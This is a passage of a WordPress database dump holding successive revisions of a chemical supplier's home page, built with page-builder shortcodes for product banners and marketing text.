INSERT INTO `wp_posts` VALUES (1545, 1, '2016-09-12 16:38:26', '2016-09-12 16:38:26', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:38:26', '2016-09-12 16:38:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1546, 1, '2016-09-12 16:39:04', '2016-09-12 16:39:04', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:39:04', '2016-09-12 16:39:04', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1547, 1, '2016-09-12 16:39:32', '2016-09-12 16:39:32', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:39:32', '2016-09-12 16:39:32', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1548, 1, '2016-09-12 16:42:29', '2016-09-12 16:42:29', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:42:29', '2016-09-12 16:42:29', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1549, 1, '2016-09-12 16:43:53', '2016-09-12 16:43:53', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:43:53', '2016-09-12 16:43:53', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1550, 1, '2016-09-12 16:45:47', '2016-09-12 16:45:47', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:45:47', '2016-09-12 16:45:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1551, 1, '2016-09-12 16:46:27', '2016-09-12 16:46:27', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', 